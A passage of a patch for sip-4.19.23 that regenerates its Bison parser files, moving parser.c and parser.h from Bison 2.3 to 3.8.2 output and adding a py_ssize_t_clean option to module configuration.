&(yyvsp[-2].memArg), TRUE); + } ++#line 8075 "../parser.c" + break; + +- case 559: +-#line 4538 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- add_new_deref(&(yyval.memArg), &(yyvsp[(1) - (2)].memArg), FALSE); ++ case 560: /* deref: deref '*' */ ++#line 4564 "parser.y" ++ { ++ add_new_deref(&(yyval.memArg), &(yyvsp[-1].memArg), FALSE); + } ++#line 8083 "../parser.c" + break; + +- case 560: +-#line 4543 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 561: /* basetype: scopedname */ ++#line 4569 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = defined_type; +- (yyval.memArg).u.snd = (yyvsp[(1) - (1)].scpvalp); ++ (yyval.memArg).u.snd = (yyvsp[0].scpvalp); + + /* Try and resolve typedefs as early as possible. */ + resolveAnyTypedef(currentSpec, &(yyval.memArg)); + } ++#line 8096 "../parser.c" + break; + +- case 561: +-#line 4551 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 562: /* basetype: scopedname '<' cpptypelist '>' */ ++#line 4577 "parser.y" ++ { + templateDef *td; + + td = sipMalloc(sizeof(templateDef)); +- td->fqname = (yyvsp[(1) - (4)].scpvalp); +- td->types = (yyvsp[(3) - (4)].signature); ++ td->fqname = (yyvsp[-3].scpvalp); ++ td->types = (yyvsp[-1].signature); + + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = template_type; + (yyval.memArg).u.td = td; + } ++#line 8112 "../parser.c" + break; + +- case 562: +-#line 4562 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 563: /* basetype: TK_STRUCT scopedname */ ++#line 4588 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + + /* In a C module all structures must be defined. */ + if (currentSpec -> genc) + { + (yyval.memArg).atype = defined_type; +- (yyval.memArg).u.snd = (yyvsp[(2) - (2)].scpvalp); ++ (yyval.memArg).u.snd = (yyvsp[0].scpvalp); + } + else + { + (yyval.memArg).atype = struct_type; +- (yyval.memArg).u.sname = (yyvsp[(2) - (2)].scpvalp); ++ (yyval.memArg).u.sname = (yyvsp[0].scpvalp); + } + } ++#line 8132 "../parser.c" + break; + +- case 563: +-#line 4577 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 564: /* basetype: TK_UNSIGNED TK_SHORT */ ++#line 4603 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ushort_type; + } ++#line 8141 "../parser.c" + break; + +- case 564: +-#line 4581 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 565: /* basetype: TK_SHORT */ ++#line 4607 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = short_type; + } ++#line 8150 "../parser.c" + break; + +- case 565: +-#line 4585 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 566: /* basetype: TK_UNSIGNED */ ++#line 4611 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = uint_type; + } ++#line 8159 "../parser.c" + break; + +- case 566: +-#line 4589 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 567: /* basetype: TK_UNSIGNED TK_INT */ ++#line 4615 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = uint_type; + } ++#line 8168 "../parser.c" + break; + +- case 567: +-#line 4593 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 568: /* basetype: TK_INT */ ++#line 4619 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = int_type; + } ++#line 8177 "../parser.c" + break; + +- case 568: +-#line 4597 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 569: /* basetype: TK_LONG */ ++#line 4623 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = long_type; + } ++#line 8186 "../parser.c" + break; + +- case 569: +-#line 4601 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 570: /* basetype: TK_UNSIGNED TK_LONG */ ++#line 4627 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ulong_type; + } ++#line 8195 "../parser.c" + break; + +- case 570: +-#line 4605 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 571: /* basetype: TK_LONG TK_LONG */ ++#line 4631 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = longlong_type; + } ++#line 8204 "../parser.c" + break; + +- case 571: +-#line 4609 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 572: /* basetype: TK_UNSIGNED TK_LONG TK_LONG */ ++#line 4635 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ulonglong_type; + } ++#line 8213 "../parser.c" + break; + +- case 572: +-#line 4613 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 573: /* basetype: TK_FLOAT */ ++#line 4639 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = float_type; + } ++#line 8222 "../parser.c" + break; + +- case 573: +-#line 4617 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 574: /* basetype: TK_DOUBLE */ ++#line 4643 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = double_type; + } ++#line 8231 "../parser.c" + break; + +- case 574: +-#line 4621 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 575: /* basetype: TK_BOOL */ ++#line 4647 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = bool_type; + } ++#line 8240 "../parser.c" + break; + +- case 575: +-#line 4625 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 576: /* basetype: TK_SIGNED TK_CHAR */ ++#line 4651 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = sstring_type; + } ++#line 8249 "../parser.c" + break; + +- case 576: +-#line 4629 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 577: /* basetype: TK_UNSIGNED TK_CHAR */ ++#line 4655 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ustring_type; + } ++#line 8258 "../parser.c" + break; + +- case 577: +-#line 4633 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 578: /* basetype: TK_CHAR */ ++#line 4659 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = string_type; + } ++#line 8267 "../parser.c" + break; + +- case 578: +-#line 4637 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 579: /* basetype: TK_WCHAR_T */ ++#line 4663 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = wstring_type; + } ++#line 8276 "../parser.c" + break; + +- case 579: +-#line 4641 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 580: /* basetype: TK_VOID */ ++#line 4667 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = void_type; + } ++#line 8285 "../parser.c" + break; + +- case 580: +-#line 4645 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 581: /* basetype: TK_PYOBJECT */ ++#line 4671 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pyobject_type; + } ++#line 8294 "../parser.c" + break; + +- case 581: +-#line 4649 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 582: /* basetype: TK_PYTUPLE */ ++#line 4675 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pytuple_type; + } ++#line 8303 "../parser.c" + break; + +- case 582: +-#line 4653 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 583: /* basetype: TK_PYLIST */ ++#line 4679 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pylist_type; + } ++#line 8312 "../parser.c" + break; + +- case 583: +-#line 4657 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 584: /* basetype: TK_PYDICT */ ++#line 4683 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pydict_type; + } ++#line 8321 "../parser.c" + break; + +- case 584: +-#line 4661 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 585: /* basetype: TK_PYCALLABLE */ ++#line 4687 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pycallable_type; + } ++#line 8330 "../parser.c" + break; + +- case 585: +-#line 4665 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 586: /* basetype: TK_PYSLICE */ ++#line 4691 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pyslice_type; + } ++#line 8339 "../parser.c" + break; + +- case 586: +-#line 4669 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 587: /* basetype: TK_PYTYPE */ ++#line 4695 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pytype_type; + } ++#line 8348 "../parser.c" + break; + +- case 587: +-#line 4673 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 588: /* basetype: TK_PYBUFFER */ ++#line 4699 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pybuffer_type; + } ++#line 8357 "../parser.c" + break; + +- case 588: +-#line 4677 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 589: /* basetype: TK_SIPSSIZET */ ++#line 4703 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ssize_type; + } ++#line 8366 "../parser.c" + break; + +- case 589: +-#line 4681 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 590: /* basetype: TK_SIZET */ ++#line 4707 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = size_type; + } ++#line 8375 "../parser.c" + break; + +- case 590: +-#line 4685 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 591: /* basetype: TK_ELLIPSIS */ ++#line 4711 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ellipsis_type; + } ++#line 8384 "../parser.c" + break; + +- case 591: +-#line 4691 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 592: /* cpptypelist: cpptype */ ++#line 4717 "parser.y" ++ { + /* The single or first type. */ + +- (yyval.signature).args[0] = (yyvsp[(1) - (1)].memArg); ++ (yyval.signature).args[0] = (yyvsp[0].memArg); + (yyval.signature).nrArgs = 1; + } ++#line 8395 "../parser.c" + break; + +- case 592: +-#line 4697 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 593: /* cpptypelist: cpptypelist ',' cpptype */ ++#line 4723 "parser.y" ++ { + /* Check there is nothing after an ellipsis. */ +- if ((yyvsp[(1) - (3)].signature).args[(yyvsp[(1) - (3)].signature).nrArgs - 1].atype == ellipsis_type) ++ if ((yyvsp[-2].signature).args[(yyvsp[-2].signature).nrArgs - 1].atype == ellipsis_type) + yyerror("An ellipsis must be at the end of the argument list"); + + /* Check there is room. */ +- if ((yyvsp[(1) - (3)].signature).nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].signature).nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + +- (yyval.signature) = (yyvsp[(1) - (3)].signature); ++ (yyval.signature) = (yyvsp[-2].signature); + +- (yyval.signature).args[(yyval.signature).nrArgs] = (yyvsp[(3) - (3)].memArg); ++ (yyval.signature).args[(yyval.signature).nrArgs] = (yyvsp[0].memArg); + (yyval.signature).nrArgs++; + } ++#line 8414 "../parser.c" + break; + +- case 593: +-#line 4713 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 594: /* optexceptions: %empty */ ++#line 4739 "parser.y" ++ { + (yyval.throwlist) = NULL; + } ++#line 8422 "../parser.c" + break; + +- case 594: +-#line 4716 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 595: /* optexceptions: TK_THROW '(' exceptionlist ')' */ ++#line 4742 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Exceptions not allowed in a C module"); + +- (yyval.throwlist) = (yyvsp[(3) - (4)].throwlist); ++ (yyval.throwlist) = (yyvsp[-1].throwlist); + } ++#line 8433 "../parser.c" + break; + +- case 595: +-#line 4724 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 596: /* exceptionlist: %empty */ ++#line 4750 "parser.y" ++ { + /* Empty list so use a blank. */ + + (yyval.throwlist) = sipMalloc(sizeof (throwArgs)); + (yyval.throwlist) -> nrArgs = 0; + } ++#line 8444 "../parser.c" + break; + +- case 596: +-#line 4730 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 597: /* exceptionlist: scopedname */ ++#line 4756 "parser.y" ++ { + /* The only or first exception. */ + + (yyval.throwlist) = sipMalloc(sizeof (throwArgs)); + (yyval.throwlist) -> nrArgs = 1; +- (yyval.throwlist) -> args[0] = findException(currentSpec, (yyvsp[(1) - (1)].scpvalp), FALSE); ++ (yyval.throwlist) -> args[0] = findException(currentSpec, (yyvsp[0].scpvalp), FALSE); + } ++#line 8456 "../parser.c" + break; + +- case 597: +-#line 4737 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 598: /* exceptionlist: exceptionlist ',' scopedname */ ++#line 4763 "parser.y" ++ { + /* Check that it wasn't ...(,arg...). */ + +- if ((yyvsp[(1) - (3)].throwlist) -> nrArgs == 0) ++ if ((yyvsp[-2].throwlist) -> nrArgs == 0) + yyerror("First exception of throw specifier is missing"); + + /* Check there is room. */ + +- if ((yyvsp[(1) - (3)].throwlist) -> nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].throwlist) -> nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + +- (yyval.throwlist) = (yyvsp[(1) - (3)].throwlist); +- (yyval.throwlist) -> args[(yyval.throwlist) -> nrArgs++] = findException(currentSpec, (yyvsp[(3) - (3)].scpvalp), FALSE); ++ (yyval.throwlist) = (yyvsp[-2].throwlist); ++ (yyval.throwlist) -> args[(yyval.throwlist) -> nrArgs++] = findException(currentSpec, (yyvsp[0].scpvalp), FALSE); + } ++#line 8475 "../parser.c" + break; + + +-/* Line 1267 of yacc.c. */ +-#line 8408 "sip-4.19.23/sipgen/parser.c" ++#line 8479 "../parser.c" ++ + default: break; + } +- YY_SYMBOL_PRINT ("-> $$ =", yyr1[yyn], &yyval, &yyloc); ++ /* User semantic actions sometimes alter yychar, and that requires ++ that yytoken be updated with the new translation. We take the ++ approach of translating immediately before every use of yytoken. ++ One alternative is translating here after every semantic action, ++ but that translation would be missed if the semantic action invokes ++ YYABORT, YYACCEPT, or YYERROR immediately after altering yychar or ++ if it invokes YYBACKUP. In the case of YYABORT or YYACCEPT, an ++ incorrect destructor might then be invoked immediately. In the ++ case of YYERROR or YYBACKUP, subsequent parser actions might lead ++ to an incorrect destructor call or verbose syntax error message ++ before the lookahead is translated. */ ++ YY_SYMBOL_PRINT ("-> $$ =", YY_CAST (yysymbol_kind_t, yyr1[yyn]), &yyval, &yyloc); + + YYPOPSTACK (yylen); + yylen = 0; +- YY_STACK_PRINT (yyss, yyssp); + + *++yyvsp = yyval; + +- +- /* Now `shift' the result of the reduction. Determine what state ++ /* Now 'shift' the result of the reduction. Determine what state + that goes to, based on the state we popped back to and the rule + number reduced by. */ +- +- yyn = yyr1[yyn]; +- +- yystate = yypgoto[yyn - YYNTOKENS] + *yyssp; +- if (0 <= yystate && yystate <= YYLAST && yycheck[yystate] == *yyssp) +- yystate = yytable[yystate]; +- else +- yystate = yydefgoto[yyn - YYNTOKENS]; ++ { ++ const int yylhs = yyr1[yyn] - YYNTOKENS; ++ const int yyi = yypgoto[yylhs] + *yyssp; ++ yystate = (0 <= yyi && yyi <= YYLAST && yycheck[yyi] == *yyssp ++ ? yytable[yyi] ++ : yydefgoto[yylhs]); ++ } + + goto yynewstate; + + +-/*------------------------------------. +-| yyerrlab -- here on detecting error | +-`------------------------------------*/ ++/*--------------------------------------. ++| yyerrlab -- here on detecting error. | ++`--------------------------------------*/ + yyerrlab: ++ /* Make sure we have latest lookahead translation. See comments at ++ user semantic actions for why this is necessary. */ ++ yytoken = yychar == YYEMPTY ? YYSYMBOL_YYEMPTY : YYTRANSLATE (yychar); + /* If not already recovering from an error, report this error. */ + if (!yyerrstatus) + { + ++yynerrs; +-#if ! YYERROR_VERBOSE + yyerror (YY_("syntax error")); +-#else +- { +- YYSIZE_T yysize = yysyntax_error (0, yystate, yychar); +- if (yymsg_alloc < yysize && yymsg_alloc < YYSTACK_ALLOC_MAXIMUM) +- { +- YYSIZE_T yyalloc = 2 * yysize; +- if (! (yysize <= yyalloc && yyalloc <= YYSTACK_ALLOC_MAXIMUM)) +- yyalloc = YYSTACK_ALLOC_MAXIMUM; +- if (yymsg != yymsgbuf) +- YYSTACK_FREE (yymsg); +- yymsg = (char *) YYSTACK_ALLOC (yyalloc); +- if (yymsg) +- yymsg_alloc = yyalloc; +- else +- { +- yymsg = yymsgbuf; +- yymsg_alloc = sizeof yymsgbuf; +- } +- } +- +- if (0 < yysize && yysize <= yymsg_alloc) +- { +- (void) yysyntax_error (yymsg, yystate, yychar); +- yyerror (yymsg); +- } +- else +- { +- yyerror (YY_("syntax error")); +- if (yysize != 0) +- goto yyexhaustedlab; +- } +- } +-#endif + } + +- +- + if (yyerrstatus == 3) + { +- /* If just tried and failed to reuse look-ahead token after an +- error, discard it. */ ++ /* If just tried and failed to reuse lookahead token after an ++ error, discard it. */ + + if (yychar <= YYEOF) +- { +- /* Return failure if at end of input. */ +- if (yychar == YYEOF) +- YYABORT; +- } ++ { ++ /* Return failure if at end of input. */ ++ if (yychar == YYEOF) ++ YYABORT; ++ } + else +- { +- yydestruct ("Error: discarding", +- yytoken, &yylval); +- yychar = YYEMPTY; +- } ++ { ++ yydestruct ("Error: discarding", ++ yytoken, &yylval); ++ yychar = YYEMPTY; ++ } + } + +- /* Else will try to reuse look-ahead token after shifting the error ++ /* Else will try to reuse lookahead token after shifting the error + token. */ + goto yyerrlab1; + +@@ -8506,14 +8553,13 @@ yyerrlab: + | yyerrorlab -- error raised explicitly by YYERROR. | + `---------------------------------------------------*/ + yyerrorlab: ++ /* Pacify compilers when the user code never invokes YYERROR and the ++ label yyerrorlab therefore never appears in user code. */ ++ if (0) ++ YYERROR; ++ ++yynerrs; + +- /* Pacify compilers like GCC when the user code never invokes +- YYERROR and the label yyerrorlab therefore never appears in user +- code. */ +- if (/*CONSTCOND*/ 0) +- goto yyerrorlab; +- +- /* Do not reclaim the symbols of the rule which action triggered ++ /* Do not reclaim the symbols of the rule whose action triggered + this YYERROR. */ + YYPOPSTACK (yylen); + yylen = 0; +@@ -8526,42 +8572,42 @@ yyerrorlab: + | yyerrlab1 -- common code for both syntax error and YYERROR. | + `-------------------------------------------------------------*/ + yyerrlab1: +- yyerrstatus = 3; /* Each real token shifted decrements this. */ ++ yyerrstatus = 3; /* Each real token shifted decrements this. */ + ++ /* Pop stack until we find a state that shifts the error token. */ + for (;;) + { + yyn = yypact[yystate]; +- if (yyn != YYPACT_NINF) +- { +- yyn += YYTERROR; +- if (0 <= yyn && yyn <= YYLAST && yycheck[yyn] == YYTERROR) +- { +- yyn = yytable[yyn]; +- if (0 < yyn) +- break; +- } +- } ++ if (!yypact_value_is_default (yyn)) ++ { ++ yyn += YYSYMBOL_YYerror; ++ if (0 <= yyn && yyn <= YYLAST && yycheck[yyn] == YYSYMBOL_YYerror) ++ { ++ yyn = yytable[yyn]; ++ if (0 < yyn) ++ break; ++ } ++ } + + /* Pop the current state because it cannot handle the error token. */ + if (yyssp == yyss) +- YYABORT; ++ YYABORT; + + + yydestruct ("Error: popping", +- yystos[yystate], yyvsp); ++ YY_ACCESSING_SYMBOL (yystate), yyvsp); + YYPOPSTACK (1); + yystate = *yyssp; + YY_STACK_PRINT (yyss, yyssp); + } + +- if (yyn == YYFINAL) +- YYACCEPT; +- ++ YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN + *++yyvsp = yylval; ++ YY_IGNORE_MAYBE_UNINITIALIZED_END + + + /* Shift the error token. */ +- YY_SYMBOL_PRINT ("Shifting", yystos[yyn], yyvsp, yylsp); ++ YY_SYMBOL_PRINT ("Shifting", YY_ACCESSING_SYMBOL (yyn), yyvsp, yylsp); + + yystate = yyn; + goto yynewstate; +@@ -8572,53 +8618,57 @@ yyerrlab1: + `-------------------------------------*/ + yyacceptlab: + yyresult = 0; +- goto yyreturn; ++ goto yyreturnlab; ++ + + /*-----------------------------------. + | yyabortlab -- YYABORT comes here. | + `-----------------------------------*/ + yyabortlab: + yyresult = 1; +- goto yyreturn; ++ goto yyreturnlab; + +-#ifndef yyoverflow +-/*-------------------------------------------------. +-| yyexhaustedlab -- memory exhaustion comes here. | +-`-------------------------------------------------*/ ++ ++/*-----------------------------------------------------------. ++| yyexhaustedlab -- YYNOMEM (memory exhaustion) comes here. | ++`-----------------------------------------------------------*/ + yyexhaustedlab: + yyerror (YY_("memory exhausted")); + yyresult = 2; +- /* Fall through. */ +-#endif ++ goto yyreturnlab; ++ + +-yyreturn: +- if (yychar != YYEOF && yychar != YYEMPTY) +- yydestruct ("Cleanup: discarding lookahead", +- yytoken, &yylval); +- /* Do not reclaim the symbols of the rule which action triggered ++/*----------------------------------------------------------. ++| yyreturnlab -- parsing is finished, clean up and return. | ++`----------------------------------------------------------*/ ++yyreturnlab: ++ if (yychar != YYEMPTY) ++ { ++ /* Make sure we have latest lookahead translation. See comments at ++ user semantic actions for why this is necessary. */ ++ yytoken = YYTRANSLATE (yychar); ++ yydestruct ("Cleanup: discarding lookahead", ++ yytoken, &yylval); ++ } ++ /* Do not reclaim the symbols of the rule whose action triggered + this YYABORT or YYACCEPT. */ + YYPOPSTACK (yylen); + YY_STACK_PRINT (yyss, yyssp); + while (yyssp != yyss) + { + yydestruct ("Cleanup: popping", +- yystos[*yyssp], yyvsp); ++ YY_ACCESSING_SYMBOL (+*yyssp), yyvsp); + YYPOPSTACK (1); + } + #ifndef yyoverflow + if (yyss != yyssa) + YYSTACK_FREE (yyss); + #endif +-#if YYERROR_VERBOSE +- if (yymsg != yymsgbuf) +- YYSTACK_FREE (yymsg); +-#endif +- /* Make sure YYID is used. */ +- return YYID (yyresult); +-} + ++ return yyresult; ++} + +-#line 4753 "sip-4.19.23/sipgen/metasrc/parser.y" ++#line 4779 "parser.y" + + + +@@ -13382,9 +13432,9 @@ static void addProperty(sipSpec *pt, mod + */ + static moduleDef *configureModule(sipSpec *pt, moduleDef *module, + const char *filename, const char *name, int c_module, KwArgs kwargs, +- int use_arg_names, int use_limited_api, int call_super_init, +- int all_raise_py_exc, const char *def_error_handler, +- docstringDef *docstring) ++ int use_arg_names, int py_ssize_t_clean, int use_limited_api, ++ int call_super_init, int all_raise_py_exc, ++ const char *def_error_handler, docstringDef *docstring) + { + moduleDef *mod; + +@@ -13418,6 +13468,9 @@ static moduleDef *configureModule(sipSpe + if (use_arg_names) + setUseArgNames(module); + ++ if (py_ssize_t_clean) ++ setPY_SSIZE_T_CLEAN(module); ++ + if (use_limited_api) + setUseLimitedAPI(module); + +@@ -13597,4 +13650,3 @@ static void checkEllipsis(signatureDef * + if (sd->args[a].atype == ellipsis_type && a < sd->nrArgs - 1) + yyerror("An ellipsis must be at the end of the argument list if /NoArgParser/ is not specified"); + } +- +Index: sip-4.19.23/sipgen/parser.h +=================================================================== +--- sip-4.19.23.orig/sipgen/parser.h ++++ sip-4.19.23/sipgen/parser.h +@@ -1,14 +1,14 @@ +-/* A Bison parser, made by GNU Bison 2.3. */ ++/* A Bison parser, made by GNU Bison 3.8.2. */ + +-/* Skeleton interface for Bison's Yacc-like parsers in C ++/* Bison interface for Yacc-like parsers in C + +- Copyright (C) 1984, 1989, 1990, 2000, 2001, 2002, 2003, 2004, 2005, 2006 +- Free Software Foundation, Inc. ++ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2021 Free Software Foundation, ++ Inc. + +- This program is free software; you can redistribute it and/or modify ++ This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by +- the Free Software Foundation; either version 2, or (at your option) +- any later version. ++ the Free Software Foundation, either version 3 of the License, or ++ (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of +@@ -16,9 +16,7 @@ + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License +- along with this program; if not, write to the Free Software +- Foundation, Inc., 51 Franklin Street, Fifth Floor, +- Boston, MA 02110-1301, USA. */ ++ along with this program. If not, see <https://www.gnu.org/licenses/>. */ + + /* As a special exception, you may create a larger work that contains + part or all of the Bison parser skeleton and distribute that work +@@ -33,164 +31,187 @@ + This special exception was added by the Free Software Foundation in + version 2.2 of Bison. */ + +-/* Tokens. */ ++/* DO NOT RELY ON FEATURES THAT ARE NOT DOCUMENTED in the manual, ++ especially those whose name start with YY_ or yy_. They are ++ private implementation details that can be changed or removed. */ ++ ++#ifndef YY_YY_PARSER_H_INCLUDED ++# define YY_YY_PARSER_H_INCLUDED ++/* Debug traces. */ ++#ifndef YYDEBUG ++# define YYDEBUG 0 ++#endif ++#if YYDEBUG ++extern int yydebug; ++#endif ++ ++/* Token kinds. */ + #ifndef YYTOKENTYPE + # define YYTOKENTYPE +- /* Put the tokens into the symbol table, so that GDB and other debuggers +- know about them. */ +- enum yytokentype { +- TK_API = 258, +- TK_AUTOPYNAME = 259, +- TK_DEFDOCSTRFMT = 260, +- TK_DEFDOCSTRSIG = 261, +- TK_DEFENCODING = 262, +- TK_PLUGIN = 263, +- TK_VIRTERRORHANDLER = 264, +- TK_EXPTYPEHINTCODE = 265, +- TK_TYPEHINTCODE = 266, +- TK_DOCSTRING = 267, +- TK_DOC = 268, +- TK_EXPORTEDDOC = 269, +- TK_EXTRACT = 270, +- TK_MAKEFILE = 271, +- TK_ACCESSCODE = 272, +- TK_GETCODE = 273, +- TK_SETCODE = 274, +- TK_PREINITCODE = 275, +- TK_INITCODE = 276, +- TK_POSTINITCODE = 277, +- TK_FINALCODE = 278, +- TK_UNITCODE = 279, +- TK_UNITPOSTINCLUDECODE = 280, +- TK_MODCODE = 281, +- TK_TYPECODE = 282, +- TK_PREPYCODE = 283, +- TK_COPYING = 284, +- TK_MAPPEDTYPE = 285, +- TK_CODELINE = 286, +- TK_IF = 287, +- TK_END = 288, +- TK_NAME_VALUE = 289, +- TK_PATH_VALUE = 290, +- TK_STRING_VALUE = 291, +- TK_VIRTUALCATCHERCODE = 292, +- TK_TRAVERSECODE = 293, +- TK_CLEARCODE = 294, +- TK_GETBUFFERCODE = 295, +- TK_RELEASEBUFFERCODE = 296, +- TK_READBUFFERCODE = 297, +- TK_WRITEBUFFERCODE = 298, +- TK_SEGCOUNTCODE = 299, +- TK_CHARBUFFERCODE = 300, +- TK_PICKLECODE = 301, +- TK_VIRTUALCALLCODE = 302, +- TK_METHODCODE = 303, +- TK_PREMETHODCODE = 304, +- TK_INSTANCECODE = 305, +- TK_FROMTYPE = 306, +- TK_TOTYPE = 307, +- TK_TOSUBCLASS = 308, +- TK_INCLUDE = 309, +- TK_OPTINCLUDE = 310, +- TK_IMPORT = 311, +- TK_EXPHEADERCODE = 312, +- TK_MODHEADERCODE = 313, +- TK_TYPEHEADERCODE = 314, +- TK_MODULE = 315, +- TK_CMODULE = 316, +- TK_CONSMODULE = 317, +- TK_COMPOMODULE = 318, +- TK_CLASS = 319, +- TK_STRUCT = 320, +- TK_PUBLIC = 321, +- TK_PROTECTED = 322, +- TK_PRIVATE = 323, +- TK_SIGNALS = 324, +- TK_SIGNAL_METHOD = 325, +- TK_SLOTS = 326, +- TK_SLOT_METHOD = 327, +- TK_BOOL = 328, +- TK_SHORT = 329, +- TK_INT = 330, +- TK_LONG = 331, +- TK_FLOAT = 332, +- TK_DOUBLE = 333, +- TK_CHAR = 334, +- TK_WCHAR_T = 335, +- TK_VOID = 336, +- TK_PYOBJECT = 337, +- TK_PYTUPLE = 338, +- TK_PYLIST = 339, +- TK_PYDICT = 340, +- TK_PYCALLABLE = 341, +- TK_PYSLICE = 342, +- TK_PYTYPE = 343, +- TK_PYBUFFER = 344, +- TK_VIRTUAL = 345, +- TK_ENUM = 346, +- TK_SIGNED = 347, +- TK_UNSIGNED = 348, +- TK_SCOPE = 349, +- TK_LOGICAL_OR = 350, +- TK_CONST = 351, +- TK_STATIC = 352, +- TK_SIPSIGNAL = 353, +- TK_SIPSLOT = 354, +- TK_SIPANYSLOT = 355, +- TK_SIPRXCON = 356, +- TK_SIPRXDIS = 357, +- TK_SIPSLOTCON = 358, +- TK_SIPSLOTDIS = 359, +- TK_SIPSSIZET = 360, +- TK_SIZET = 361, +- TK_NUMBER_VALUE = 362, +- TK_REAL_VALUE = 363, +- TK_TYPEDEF = 364, +- TK_NAMESPACE = 365, +- TK_TIMELINE = 366, +- TK_PLATFORMS = 367, +- TK_FEATURE = 368, +- TK_LICENSE = 369, +- TK_QCHAR_VALUE = 370, +- TK_TRUE_VALUE = 371, +- TK_FALSE_VALUE = 372, +- TK_NULL_VALUE = 373, +- 